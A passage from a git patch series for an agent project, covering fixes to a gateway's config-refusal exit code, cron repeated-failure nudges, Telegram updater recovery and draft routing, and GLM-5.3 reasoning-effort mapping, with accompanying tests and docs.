finish script translates into 125 "permanent failure" (#51228). This adopts that contract rather than inventing one, so the fix also works on s6 hosts, not just systemd. After: one refusal, `status=78/CONFIG`, `NRestarts=0`, unit settles in `failed`. Also strengthens the two guard tests. They asserted `pytest.raises(SystemExit, match="1")`, but `match=` is a regex search over `str(exc)`, so it passed for 1, 21, 100 and 111 alike — it read like an exit-code assertion while pinning nothing. They now assert `excinfo.value.code == GATEWAY_FATAL_CONFIG_EXIT_CODE`. The exit code is the contract here: it is the only thing that tells a supervisor the failure is permanent. --- hermes_cli/gateway.py | 13 ++++++++++++- tests/gateway/test_multiplex_lifecycle.py | 7 +++++-- 2 files changed, 17 insertions(+), 3 deletions(-) diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py index dced8278a5..1d0bf451ab 100644 --- a/hermes_cli/gateway.py +++ b/hermes_cli/gateway.py @@ -5619,7 +5619,18 @@ def _guard_named_profile_under_multiplexer(force: bool = False) -> None: print() print(" Pass --force to start a separate profile gateway anyway (not") print(" recommended while the multiplexer is running).") - sys.exit(1) + # EX_CONFIG, not a generic failure. This refusal is decided entirely by + # configuration (multiplex_profiles plus the allowlist), so it is permanent: + # no number of retries can change the answer. Exiting 1 made it look + # transient to a service manager -- and the systemd unit this module + # generates pairs Restart=always/RestartSec=5 with StartLimitIntervalSec=0, + # deliberately trading systemd's generic start-rate limiter for the specific + # RestartPreventExitStatus=GATEWAY_FATAL_CONFIG_EXIT_CODE backstop declared + # beside it. Returning 1 left that backstop unarmed with the limiter already + # off, so a correct refusal became an unbounded restart loop. 78 also reaches + # the s6 finish script's 125 "permanent failure" translation (see #51228), + # the same path the other fatal-config exits take. + sys.exit(GATEWAY_FATAL_CONFIG_EXIT_CODE) def _guard_supervised_gateway_conflict(force: bool = False) -> None: diff --git a/tests/gateway/test_multiplex_lifecycle.py b/tests/gateway/test_multiplex_lifecycle.py index fbc04b7e1b..1809a337d6 100644 --- a/tests/gateway/test_multiplex_lifecycle.py +++ b/tests/gateway/test_multiplex_lifecycle.py @@ -2,6 +2,7 @@ import pytest from gateway.config import GatewayConfig +from gateway.restart import GATEWAY_FATAL_CONFIG_EXIT_CODE class TestServedProfilesStatus: @@ -82,8 +83,9 @@ class TestNamedProfileMultiplexerGuard: from hermes_cli import gateway as gw - with pytest.raises(SystemExit, match="1"): + with pytest.raises(SystemExit) as excinfo: gw._guard_named_profile_under_multiplexer(force=False) + assert excinfo.value.code == GATEWAY_FATAL_CONFIG_EXIT_CODE def test_served_profile_is_still_guarded(self, monkeypatch, tmp_path): self._fake_running_default_gateway(monkeypatch, tmp_path) @@ -97,8 +99,9 @@ class TestNamedProfileMultiplexerGuard: from hermes_cli import gateway as gw - with pytest.raises(SystemExit, match="1"): + with pytest.raises(SystemExit) as excinfo: gw._guard_named_profile_under_multiplexer(force=False) + assert excinfo.value.code == GATEWAY_FATAL_CONFIG_EXIT_CODE @pytest.mark.parametrize( "allowlist_yaml", From dd03471858a1fb00c3fa0a62bb6bd4ec8b18e7f5 Mon Sep 17 00:00:00 2001 From: Jack Lau <72348727+jackulau@users.noreply.github.com> Date: Thu, 20 Aug 2026 03:52:44 -0500 Subject: [PATCH 052/161] fix(cron): nudge review of escaped-run failures too A recurring job that fails at the scheduler layer - an exception escaping run_one_job's body before the agent is ever constructed - has delivered a failure alert since 4668750fa. It has never carried the repeated-failure review nudge the normal agent-failure delivery carries: the nudge (#80752, 2026-08-06) predates that second delivery site by eight days and only ever composed the first one. The streak itself is layer-agnostic. mark_job_run increments failure_streak for an escaped failure exactly as it does for an agent failure, and the escape handler calls it. So the counter climbs correctly and shows up in `hermes cron list`, but the chat message that spends it is unreachable for a job whose failures ALL escape - a half-applied update leaving a bad import, a provider client that cannot construct. Those are precisely the failures that repeat identically on every tick, so the operator gets the same one-line error every 10 minutes indefinitely and is never told the automation itself is worth reviewing or pausing. Compose the nudge at the escape handler's delivery exactly as the normal path does. It stays config-gated and threshold-gated by the same helper, so a first-time escaped failure reads exactly as it did before. Docs said the streak counts "runs where the agent failed", which is what the reporter read and reasonably concluded their failures were out of scope. The counter never worked that way; correct the sentence to match the code. Tests: two cases on the escaped-failure delivery path - streak at threshold appends the nudge (fails on the unfixed handler with the bare summary), and streak below threshold delivers the unchanged one-liner, so the guard also proves the nudge is not unconditional. The existing nudge tests only ever exercised the helper in isolation, which is why the second delivery site could be added without it. Fixes #88655 --- cron/scheduler.py | 9 ++- tests/cron/test_run_one_job.py | 76 ++++++++++++++++++++++++ website/docs/user-guide/features/cron.md | 16 ++--- 3 files changed, 93 insertions(+), 8 deletions(-) diff --git a/cron/scheduler.py b/cron/scheduler.py index 082cdaedd1..19cbcbc537 100644 --- a/cron/scheduler.py +++ b/cron/scheduler.py @@ -7070,7 +7070,14 @@ def _run_one_job_body( delivery_attempted = True delivery_error = _deliver_result( job, - _summarize_cron_failure_for_delivery(job, _err_text), + # Composed exactly like the normal failure delivery above. + # mark_job_run below records THIS run in failure_streak + # whichever layer failed, so a job that fails before the + # run body every tick builds a streak nobody is ever told + # about: its alerts only ever leave through here, and the + # nudge only ever left through there (#88655). + _summarize_cron_failure_for_delivery(job, _err_text) + + _failure_streak_nudge(job), adapters=adapters, loop=loop, ) diff --git a/tests/cron/test_run_one_job.py b/tests/cron/test_run_one_job.py index 190d6049c8..6d370b9ff0 100644 --- a/tests/cron/test_run_one_job.py +++ b/tests/cron/test_run_one_job.py @@ -161,6 +161,82 @@ def test_run_one_job_exception_records_failure_alert_delivery_error(monkeypatch) ] +def _patch_escaped_failure(monkeypatch, delivered, *, exec_id, err): + """Make run_job raise, and capture what the escape handler delivers.""" + monkeypatch.setattr(s, "create_execution", lambda *_a, **_kw: {"id": exec_id}) + monkeypatch.setattr(s, "claim_dispatch", lambda _job_id: True) + monkeypatch.setattr(s, "mark_execution_running", lambda _execution_id: None) + monkeypatch.setattr( + s, + "run_job", + lambda *_a, **_kw: (_ for _ in ()).throw(RuntimeError(err)), + ) + monkeypatch.setattr( + s, + "_deliver_result", + lambda job, content, **_kw: delivered.append(content) or None, + ) + monkeypatch.setattr(s, "mark_job_run", lambda *_a, **_kw: None) + monkeypatch.setattr(s, "finish_execution", lambda *_a, **_kw: None) + # Deterministic threshold: default 3, independent of the host config. + monkeypatch.setattr(s, "load_config", lambda: {}) + + +def test_escaped_failure_delivery_carries_the_streak_nudge(monkeypatch): + """A repeatedly-failing job must be nudged even when it fails at the + scheduler layer (#88655). + + ``mark_job_run`` increments ``failure_streak`` for an escaped failure just + as it does for an agent failure, so the counter climbs either way. But the + nudge that spends it was only composed on the normal delivery path, so a + job that raises before the run body on every tick - a bad import from a + half-applied update, a provider client that cannot construct - alerts + forever and is never told it should be reviewed or paused. Nothing else + surfaces the streak in chat. + """ + delivered = [] + _patch_escaped_failure( + monkeypatch, delivered, exec_id="exec-j5", err="cannot import name X" + ) + + ok = s.run_one_job( + { + "id": "j5", + "name": "scout", + "deliver": "telegram", + "schedule": {"kind": "interval"}, + "failure_streak": 2, # + this run = 3 = default threshold + } + ) + + assert ok is False + assert len(delivered) == 1 + assert "cannot import name X" in delivered[0] + assert "failed 3 runs in a row" in delivered[0] + assert "hermes cron pause scout" in delivered[0] + + +def test_escaped_failure_delivery_stays_quiet_below_the_threshold(monkeypatch): + """The nudge is appended, not always-on: a first failure reads as before.""" + delivered = [] + _patch_escaped_failure( + monkeypatch, delivered, exec_id="exec-j6", err="provider failed" + ) + + ok = s.run_one_job( + { + "id": "j6", + "name": "scout", + "deliver": "telegram", + "schedule": {"kind": "interval"}, + "failure_streak": 0, + } + ) + + assert ok is False + assert delivered == ["⚠️ Cron 'scout' failed: provider failed"] + + def test_run_one_job_exception_after_delivery_does_not_redeliver(monkeypatch): """Once delivery has been attempted, the outer handler must not send again.""" delivered = [] diff --git a/website/docs/user-guide/features/cron.md b/website/docs/user-guide/features/cron.md index ab1e185f14..cb91709320 100644 --- a/website/docs/user-guide/features/cron.md +++ b/website/docs/user-guide/features/cron.md @@ -334,13 +334,15 @@ ledger is included in quick backups. ### Repeated-failure review nudge -Each job tracks a `failure_streak` — consecutive runs where the agent failed -(delivery failures don't count). When a *recurring* job's streak reaches the -threshold, the failure message delivered to chat gains a review nudge telling -you the job has failed N runs in a row and suggesting you fix, pause -(`hermes cron pause `), or remove it. Any successful run resets the -streak, and `hermes cron list` shows the streak alongside a failing job's last -run. One-shot jobs never nudge. +Each job tracks a `failure_streak` — consecutive failed runs (delivery +failures don't count). A run that fails before the agent is reached at all — +a bad import after a half-applied update, a provider client that cannot be +constructed — counts and alerts the same as one the agent itself failed. When +a *recurring* job's streak reaches the threshold, the failure message +delivered to chat gains a review nudge telling you the job has failed N runs +in a row and suggesting you fix, pause (`hermes cron pause `), or remove +it. Any successful run resets the streak, and `hermes cron list` shows the +streak alongside a failing job's last run. One-shot jobs never nudge. ```yaml cron: From 9e36774d77b90982f225c5417c92ee95a1ec9ec9 Mon Sep 17 00:00:00 2001 From: Good Chang Date: Fri, 21 Aug 2026 12:57:18 +0000 Subject: [PATCH 053/161] fix(telegram): rebuild after cancellation-shielded stop Use the existing wall-clock deadline helper for updater.stop() during network recovery. If PTB cleanup remains cancellation-shielded past the deadline, escalate to retryable fatal recovery so the runner builds a fresh adapter instead of calling start_polling() while the old Updater may still hold its lifecycle lock. Add regression coverage with stop() swallowing cancellation while holding the same lock start_polling() needs, and verify the old Updater is never reused. --- contributors/emails/gc@erek.ai | 1 + plugins/platforms/telegram/adapter.py | 20 ++++- .../test_telegram_network_reconnect.py | 85 +++++++++++++++++-- 3 files changed, 94 insertions(+), 12 deletions(-) create mode 100644 contributors/emails/gc@erek.ai diff --git a/contributors/emails/gc@erek.ai b/contributors/emails/gc@erek.ai new file mode 100644 index 0000000000..bcddd1bd02 --- /dev/null +++ b/contributors/emails/gc@erek.ai @@ -0,0 +1 @@ +goodchang77 diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index 7fb1469bbd..fa4054b1ba 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -2990,14 +2990,26 @@ class TelegramAdapter(BasePlatformAdapter): # the gateway silently drops messages for hours. # Bounding stop() lets the reconnect ladder always advance. # Refs: NousResearch/hermes-agent#58270 - await asyncio.wait_for(app.updater.stop(), timeout=_UPDATER_STOP_TIMEOUT) + await _await_with_thread_deadline( + app.updater.stop(), timeout=_UPDATER_STOP_TIMEOUT + ) except asyncio.TimeoutError: - logger.warning( + message = ( + "Telegram updater.stop() did not finish before the network-" + "recovery deadline; rebuilding the adapter instead of reusing " + "an Updater whose lifecycle lock may still be held." + ) + logger.error( "[%s] updater.stop() timed out during network-error " - "reconnect (likely CLOSE-WAIT socket); forcing drain " - "and restart without clean stop", + "reconnect (likely CLOSE-WAIT socket); escalating to fresh-" + "adapter recovery", self.name, ) + self._set_fatal_error( + "telegram_network_error", message, retryable=True + ) + await self._handoff_polling_fatal_error() + return except Exception: pass diff --git a/tests/gateway/test_telegram_network_reconnect.py b/tests/gateway/test_telegram_network_reconnect.py index 73b4b1611e..b851356bf5 100644 --- a/tests/gateway/test_telegram_network_reconnect.py +++ b/tests/gateway/test_telegram_network_reconnect.py @@ -206,6 +206,70 @@ async def test_reconnect_continues_if_drain_hangs(monkeypatch): ) +@pytest.mark.asyncio +async def test_reconnect_stop_deadline_does_not_wait_for_cancel_cleanup(monkeypatch): + """A cancellation-resistant PTB stop must not freeze the retry ladder. + + ``asyncio.wait_for`` waits for the cancelled coroutine to finish. AnyIO's + cancellation-shielded httpcore cleanup can therefore leave ``stop()`` + pending forever after the timeout fires: the gateway process stays alive, + but no later Telegram retry runs. The wall-clock deadline must abandon + that task and escalate to a fresh adapter without reusing the Updater. + """ + adapter = _make_adapter() + adapter._polling_network_error_count = 1 + + release_stop = asyncio.Event() + stop_cancelled = asyncio.Event() + lifecycle_lock = asyncio.Lock() + + async def _cancellation_resistant_stop(): + async with lifecycle_lock: + try: + await asyncio.Event().wait() + except asyncio.CancelledError: + stop_cancelled.set() + await release_stop.wait() + + async def _start_polling_with_same_lock(*args, **kwargs): + async with lifecycle_lock: + return None + + mock_updater = MagicMock() + mock_updater.running = True + mock_updater.stop = AsyncMock(side_effect=_cancellation_resistant_stop) + mock_updater.start_polling = AsyncMock(side_effect=_start_polling_with_same_lock) + + mock_app = MagicMock() + mock_app.updater = mock_updater + mock_app.bot = MagicMock() + mock_app.bot._request = () + adapter._app = mock_app + adapter._notify_fatal_error = AsyncMock() + + monkeypatch.setattr(tg_adapter, "_UPDATER_STOP_TIMEOUT", 0.01) + with patch("asyncio.sleep", new_callable=AsyncMock): + recovery = asyncio.create_task( + adapter._handle_polling_network_error(Exception("Timed out")) + ) + done, _ = await asyncio.wait({recovery}, timeout=0.2) + + try: + assert recovery in done, ( + "reconnect remained blocked waiting for cancellation-shielded " + "updater.stop() cleanup" + ) + assert stop_cancelled.is_set() + assert adapter.has_fatal_error + adapter._notify_fatal_error.assert_awaited_once() + mock_updater.start_polling.assert_not_awaited() + finally: + release_stop.set() + if not recovery.done(): + recovery.cancel() + await asyncio.gather(recovery, return_exceptions=True) + + @pytest.mark.asyncio async def test_heartbeat_force_escalates_wedged_recovery_task(monkeypatch): """#66377: the heartbeat is an independent, cause-agnostic watchdog. @@ -549,12 +613,12 @@ async def test_handle_polling_network_error_updater_stop_timeout(): When the underlying TCP connection is in CLOSE-WAIT, PTB's polling task is blocked on epoll on the dead socket. updater.stop() awaits that task and - therefore hangs indefinitely. The fix wraps stop() in asyncio.wait_for() - with a 15-second timeout so the reconnect always advances. + therefore hangs indefinitely. The wall-clock deadline abandons the stop + task and escalates to fresh-adapter recovery instead of calling + start_polling() while PTB's shared lifecycle lock may still be held. - This test simulates the hang by making stop() sleep forever and verifies - that _drain_polling_connections() and start_polling() are still called - after the timeout fires. + This test simulates the hang by making stop() outlive the deadline and + verifies that the current Updater is not drained or restarted afterward. Refs: NousResearch/hermes-agent#58270 """ adapter = _make_adapter() @@ -571,6 +635,7 @@ async def test_handle_polling_network_error_updater_stop_timeout(): app.updater.stop = _hanging_stop app.updater.start_polling = AsyncMock() adapter._app = app + adapter._notify_fatal_error = AsyncMock() drain_called = [] @@ -594,9 +659,13 @@ async def test_handle_polling_network_error_updater_stop_timeout(): with patch.object(_mod, "_UPDATER_STOP_TIMEOUT", 0.05): await adapter._handle_polling_network_error(OSError("CLOSE-WAIT test")) - # The reconnect ladder must have advanced past the hung stop(). - assert drain_called, "_drain_polling_connections was not called after stop() timeout" - assert start_polling_called, "start_polling was not called after stop() timeout" + # A timed-out stop may still hold PTB's lifecycle lock. Reusing this + # Updater would wedge start_polling() behind it, so recovery must hand the + # runner a retryable fatal and rebuild the adapter instead. + assert adapter.has_fatal_error + adapter._notify_fatal_error.assert_awaited_once() + assert not drain_called + assert not start_polling_called @pytest.mark.asyncio From 3841910cee795960fce630a8a34aa5a00f1916ab Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:11:13 +0530 Subject: [PATCH 054/161] fix(telegram): widen cancellation-shielded stop to sibling paths The network-error reconnect path (PR #91524) was the only site converted from asyncio.wait_for to _await_with_thread_deadline. The same cancellation-shielding vulnerability exists at two more updater.stop() sites: - Conflict-retry path: asyncio.wait_for could hang forever if PTB/AnyIO cleanup swallowed CancelledError, stalling the conflict-retry ladder. Now uses _await_with_thread_deadline and escalates to fatal on timeout (same reasoning: cannot safely reuse an Updater whose lifecycle lock may still be held). - Conflict-exhausted fatal path: asyncio.wait_for could hang before the fatal notification fired. Now uses _await_with_thread_deadline; the timeout handler already proceeds to fatal notify, so no behavior change beyond the deadline mechanism. All three asyncio.wait_for(updater.stop()) sites now use the thread-deadline helper consistently. --- plugins/platforms/telegram/adapter.py | 43 ++++++++++++++++++--------- 1 file changed, 29 insertions(+), 14 deletions(-) diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index fa4054b1ba..be6d38159f 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -3000,10 +3000,8 @@ class TelegramAdapter(BasePlatformAdapter): "an Updater whose lifecycle lock may still be held." ) logger.error( - "[%s] updater.stop() timed out during network-error " - "reconnect (likely CLOSE-WAIT socket); escalating to fresh-" - "adapter recovery", - self.name, + "[%s] %s (likely CLOSE-WAIT socket)", + self.name, message, ) self._set_fatal_error( "telegram_network_error", message, retryable=True @@ -3475,19 +3473,34 @@ class TelegramAdapter(BasePlatformAdapter): ) # Stop the local updater cleanly before sleeping. If it's already # stopped (e.g. PTB raised before updater.running was set) this is - # a no-op. Bounded with a timeout for the same reason as the - # network-error path: a CLOSE-WAIT socket can wedge stop() on epoll - # forever, which would stall the conflict-retry ladder. + # a no-op. Bounded with a wall-clock deadline for the same reason + # as the network-error path: a CLOSE-WAIT socket can wedge stop() + # on epoll forever. Using _await_with_thread_deadline (not + # asyncio.wait_for) because PTB/AnyIO cleanup can be cancellation- + # shielded — wait_for would hang forever waiting for cancellation + # to finish, blocking the conflict-retry ladder. try: if self._app and self._app.updater and self._app.updater.running: try: - await asyncio.wait_for(self._app.updater.stop(), timeout=_UPDATER_STOP_TIMEOUT) - except asyncio.TimeoutError: - logger.warning( - "[%s] updater.stop() timed out during conflict " - "retry (likely CLOSE-WAIT socket); continuing", - self.name, + await _await_with_thread_deadline( + self._app.updater.stop(), timeout=_UPDATER_STOP_TIMEOUT ) + except asyncio.TimeoutError: + message = ( + "Telegram updater.stop() did not finish before the " + "conflict-retry deadline; rebuilding the adapter " + "instead of reusing an Updater whose lifecycle lock " + "may still be held." + ) + logger.error( + "[%s] %s (likely CLOSE-WAIT socket)", + self.name, message, + ) + self._set_fatal_error( + "telegram_network_error", message, retryable=True + ) + await self._handoff_polling_fatal_error() + return except Exception: pass @@ -3595,7 +3608,9 @@ class TelegramAdapter(BasePlatformAdapter): self._set_fatal_error("telegram_polling_conflict", message, retryable=False) try: if self._app and self._app.updater: - await asyncio.wait_for(self._app.updater.stop(), timeout=_UPDATER_STOP_TIMEOUT) + await _await_with_thread_deadline( + self._app.updater.stop(), timeout=_UPDATER_STOP_TIMEOUT + ) except asyncio.TimeoutError: logger.warning( "[%s] updater.stop() timed out after exhausting conflict " From 30f9955a44ec17f3d07100a008b9c2e2689a16bf Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 14:47:04 -0700 Subject: [PATCH 055/161] fix(zai): GLM-5.3 low/medium reasoning effort reaches the wire instead of clamping to high GLM-5.3 accepts a graded low/medium/high/max reasoning_effort scale (verified live in #91789: monotonic reasoning-token scaling, no 400s), but the effort mapper reused GLM-5.2's two-level vocabulary, silently rewriting low/medium to high. Adds GLM53_EFFORTS/GLM53_OVERRIDES and a per-model vocabulary pick in the zai plugin; 5.2 keeps its high/max clamp. Closes #91789. Also covers the gap noted when closing #86947 (credit @santhanakrishnan-d and @terje1965 for the graded-scale finding). --- agent/reasoning_effort.py | 7 +++ plugins/model-providers/zai/__init__.py | 55 ++++++++++++++----- .../model_providers/test_zai_profile.py | 48 +++++++++++++++- 3 files changed, 95 insertions(+), 15 deletions(-) diff --git a/agent/reasoning_effort.py b/agent/reasoning_effort.py index e29c0273e5..396e9fc0be 100644 --- a/agent/reasoning_effort.py +++ b/agent/reasoning_effort.py @@ -117,6 +117,13 @@ KIMI_K3_OVERRIDES: dict[str, str] = {"medium": "high", "xhigh": "max"} GLM52_EFFORTS: tuple[str, ...] = ("high", "max") GLM52_OVERRIDES: dict[str, str] = {"xhigh": "max"} +#: GLM-5.3 widens the knob to a graded low/medium/high/max scale — verified +#: live on api.z.ai/api/coding/paas/v4 (issue #91789, 2026-08-21): every +#: level accepted with monotonic reasoning-token scaling (low=4, medium=11, +#: high=98, max=125 on the probe prompt). ``xhigh`` requests the top tier. +GLM53_EFFORTS: tuple[str, ...] = ("low", "medium", "high", "max") +GLM53_OVERRIDES: dict[str, str] = {"xhigh": "max"} + #: DeepSeek V4 OpenAI-compat endpoint: low/medium/high/max; ``xhigh`` #: requests the top tier (matches the shipped profile mapping). DEEPSEEK_V4_EFFORTS: tuple[str, ...] = ("low", "medium", "high", "max") diff --git a/plugins/model-providers/zai/__init__.py b/plugins/model-providers/zai/__init__.py index 2828caff92..5038e55503 100644 --- a/plugins/model-providers/zai/__init__.py +++ b/plugins/model-providers/zai/__init__.py @@ -65,13 +65,30 @@ def _is_glm_5_2(model: str | None) -> bool: ) -def _glm_5_2_reasoning_effort(reasoning_config: dict | None) -> str | None: - """Map Hermes reasoning effort onto GLM-5.2/5.3's native ``high``/``max``. +def _is_glm_5_3(model: str | None) -> bool: + """Detect GLM-5.3 specifically — it has a wider effort vocabulary. - These models only support two enabled effort levels. ``xhigh``/``max``/``ultra`` - request the top tier; everything else that is enabled requests ``high`` - (its minimum thinking level). When reasoning is explicitly disabled, or - no effort preference is supplied, the server default is left untouched. + 5.2 accepts only ``high``/``max``; 5.3 accepts a graded + ``low``/``medium``/``high``/``max`` scale (verified live, issue #91789), + so effort mapping must pick the vocabulary per model. + """ + m = (model or "").strip().lower() + if not m: + return False + return any(token in m for token in ("glm-5.3", "glm-5-3", "glm-5p3")) + + +def _glm_5_2_reasoning_effort( + reasoning_config: dict | None, *, model: str | None = None +) -> str | None: + """Map Hermes reasoning effort onto GLM's native vocabulary. + + GLM-5.2 supports two enabled effort levels (``high``/``max``); + GLM-5.3 supports the graded ``low``/``medium``/``high``/``max`` scale. + ``xhigh``/``max``/``ultra`` request the top tier; anything below the + model's floor clamps to that floor. When reasoning is explicitly + disabled, or no effort preference is supplied, the server default is + left untouched. """ if not isinstance(reasoning_config, dict): return None @@ -82,14 +99,24 @@ def _glm_5_2_reasoning_effort(reasoning_config: dict | None) -> str | None: if not effort or effort == "none": return None - # GLM-5.2's two-level vocabulary (high = its minimum thinking level, - # max = top tier) is declared in agent.reasoning_effort; xhigh rounds up - # to max. Everything at or below high clamps to high — GLM cannot think - # less than that. - from agent.reasoning_effort import GLM52_EFFORTS, GLM52_OVERRIDES, clamp_effort + # Per-model vocabulary declared in agent.reasoning_effort; xhigh rounds + # up to max on both. 5.2 cannot think less than high; 5.3 accepts a + # graded scale down to low (issue #91789). + from agent.reasoning_effort import ( + GLM52_EFFORTS, + GLM52_OVERRIDES, + GLM53_EFFORTS, + GLM53_OVERRIDES, + clamp_effort, + ) - clamped = clamp_effort(effort, GLM52_EFFORTS, GLM52_OVERRIDES) - return clamped if clamped in GLM52_EFFORTS else "high" + if _is_glm_5_3(model): + efforts, overrides, floor = GLM53_EFFORTS, GLM53_OVERRIDES, "low" + else: + efforts, overrides, floor = GLM52_EFFORTS, GLM52_OVERRIDES, "high" + + clamped = clamp_effort(effort, efforts, overrides) + return clamped if clamped in efforts else floor class ZaiProfile(ProviderProfile): @@ -111,7 +138,7 @@ class ZaiProfile(ProviderProfile): extra_body["thinking"] = {"type": "enabled" if enabled else "disabled"} if _is_glm_5_2(model): - effort = _glm_5_2_reasoning_effort(reasoning_config) + effort = _glm_5_2_reasoning_effort(reasoning_config, model=model) if effort is not None: top_level["reasoning_effort"] = effort diff --git a/tests/plugins/model_providers/test_zai_profile.py b/tests/plugins/model_providers/test_zai_profile.py index 58915b0daa..30b0aaf9a7 100644 --- a/tests/plugins/model_providers/test_zai_profile.py +++ b/tests/plugins/model_providers/test_zai_profile.py @@ -106,7 +106,6 @@ class TestZaiGLM52ReasoningEffort: assert extra_body == {"thinking": {"type": "disabled"}} assert top_level == {} - @pytest.mark.parametrize( "model", [ @@ -136,6 +135,53 @@ class TestZaiGLM52ReasoningEffort: assert top_level == {} +class TestZaiGLM53ReasoningEffort: + """GLM-5.3's graded low/medium/high/max effort scale (issue #91789). + + Verified live on api.z.ai/api/coding/paas/v4: all four levels accepted + with monotonic reasoning-token scaling. Unlike 5.2, low and medium must + reach the wire instead of clamping up to high. + """ + + @pytest.mark.parametrize( + ("effort", "expected"), + [ + ("low", "low"), + ("medium", "medium"), + ("high", "high"), + ("max", "max"), + ("xhigh", "max"), + ("minimal", "low"), + ], + ) + def test_graded_efforts_pass_through(self, zai_profile, effort, expected): + extra_body, top_level = zai_profile.build_api_kwargs_extras( + reasoning_config={"enabled": True, "effort": effort}, + model="glm-5.3", + ) + assert extra_body == {"thinking": {"type": "enabled"}} + assert top_level == {"reasoning_effort": expected} + + @pytest.mark.parametrize( + "model", + ["z-ai/glm-5.3", "glm-5-3", "glm-5p3", "zai-org-glm-5-3"], + ) + def test_alias_spellings_get_graded_scale(self, zai_profile, model): + _, top_level = zai_profile.build_api_kwargs_extras( + reasoning_config={"enabled": True, "effort": "low"}, + model=model, + ) + assert top_level == {"reasoning_effort": "low"} + + def test_glm_5_2_still_clamps_low_to_high(self, zai_profile): + """The 5.3 widening must not leak into 5.2's two-level wire.""" + _, top_level = zai_profile.build_api_kwargs_extras( + reasoning_config={"enabled": True, "effort": "low"}, + model="glm-5.2", + ) + assert top_level == {"reasoning_effort": "high"} + + class TestZaiModelGating: """GLM 4.5+ get thinking; earlier GLM models are left untouched.""" From 194729c95f573656eb217e8d1e93bce8a0005730 Mon Sep 17 00:00:00 2001 From: HexLab98 Date: Fri, 21 Aug 2026 17:15:01 +0700 Subject: [PATCH 056/161] fix(telegram): keep DM-topic tables on sendRichMessage when drafts degrade MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit #91241 stopped root-DM tables collapsing to bullets by keeping native draft transport when rich_drafts is off. Private Telegram topics still reject sendMessageDraft (string thread ids, forum-style thread fields), so the stream consumer falls back to edit-in-place. Telegram then rejects a rich edit of that plain MarkdownV2 preview and format_message permanently rewrites pipe tables into bullet lists — the remaining report after that merge. Route drafts through the same integer topic kwargs as send(), and on that degraded topic path prefer a fresh sendRichMessage (then delete the preview) instead of the table-to-bullets formatter. --- plugins/platforms/telegram/adapter.py | 66 +++++++++++++++++++-------- 1 file changed, 48 insertions(+), 18 deletions(-) diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index be6d38159f..6bd42ea17b 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -746,9 +746,10 @@ class TelegramAdapter(BasePlatformAdapter): # Rich draft previews use a separate opt-in. Telegram macOS / Desktop # can leave Bot API 10.1 rich draft frames visually overlaid until the # chat is redrawn, while final rich messages remain useful. - # When rich_messages is on but rich_drafts is off, supports_draft_streaming - # declines drafts so transport=auto uses edit-in-place + rich finalize - # instead of MDV2 drafts that jump to sendRichMessage at the end. + # When rich_messages is on but rich_drafts is off, keep native DM draft + # *transport* and only skip rich draft *rendering*. The persistent + # reply still lands through sendRichMessage so tables are not flattened + # by the MarkdownV2 formatter. self._rich_drafts_enabled: bool = self._coerce_bool_extra("rich_drafts", False) # Latched off after a capability failure on sendRichMessage / # sendRichMessageDraft (e.g. older python-telegram-bot without the @@ -1610,6 +1611,31 @@ class TelegramAdapter(BasePlatformAdapter): } return {"message_thread_id": cls._message_thread_id_for_send(thread_id)} + def _thread_kwargs_for_draft( + self, + chat_id: str, + metadata: Optional[Dict[str, Any]], + ) -> Dict[str, Any]: + """Routing kwargs for ``sendMessageDraft`` / ``sendRichMessageDraft``. + + Reuse :meth:`_thread_kwargs_for_send` so private DM topics get an + integer ``message_thread_id`` (or ``direct_messages_topic_id``) instead + of the raw string ``thread_id`` the draft path used to forward. + Telegram rejects that string on topics, which disabled draft streaming + for the rest of the turn and fell through to the table-to-bullets + formatter. + """ + thread_id = self._metadata_thread_id(metadata) + reply_to_id = self._reply_to_message_id_for_send(None, metadata) + kwargs = self._thread_kwargs_for_send( + chat_id, + thread_id, + metadata, + reply_to_message_id=reply_to_id, + reply_to_mode=getattr(self, "_reply_to_mode", None), + ) + return {k: v for k, v in kwargs.items() if v is not None} + @classmethod def _message_thread_id_for_send(cls, thread_id: Optional[str]) -> Optional[int]: if not thread_id or str(thread_id) == cls._GENERAL_TOPIC_THREAD_ID: @@ -2068,15 +2094,23 @@ class TelegramAdapter(BasePlatformAdapter): ) -> bool: """Whether to replace a streamed preview with a fresh rich final. - Disabled for Telegram. The fresh-final path briefly shows two copies of - the final answer, then deletes the streaming preview after the rich send - succeeds — it looks like duplicate delivery at the end of every streamed - turn (the reason #46206 reverted it). Rich finalize is instead handled - by editing the existing preview in place via Bot API 10.1's - ``editMessageText`` ``rich_message`` parameter (see - :meth:`_try_edit_rich`), so no fresh re-send / delete is needed. + Root DMs keep this off (#46206 / #47048): successful draft streaming + has no preview ``message_id``, so the hook is not consulted, and + in-place ``editMessageText.rich_message`` would duplicate a live draft + turn. Private DM *topics* often reject ``sendMessageDraft``; the + consumer then degrades to edit-in-place. Telegram rejects a rich edit + of that plain MarkdownV2 preview, and the fallback formatter + permanently turns pipe tables into bullet lists. Fresh + ``sendRichMessage`` plus deleting the preview is the remaining way to + keep native tables on that degraded path. """ - return False + metadata = metadata or {} + if not ( + metadata.get("telegram_dm_topic_reply_fallback") + or metadata.get("direct_messages_topic_id") + ): + return False + return self._rich_eligible(content) def streaming_overflow_limit(self) -> Optional[int]: """Allow the stream consumer to accumulate up to the rich-message cap @@ -2423,9 +2457,7 @@ class TelegramAdapter(BasePlatformAdapter): "draft_id": int(draft_id), "rich_message": self._rich_message_payload(content), } - thread_id = self._metadata_thread_id(metadata) - if thread_id is not None: - payload["message_thread_id"] = int(thread_id) + payload.update(self._thread_kwargs_for_draft(chat_id, metadata)) try: ok = await self._bot.do_api_request("sendRichMessageDraft", api_kwargs=payload) return bool(ok) @@ -6033,8 +6065,6 @@ class 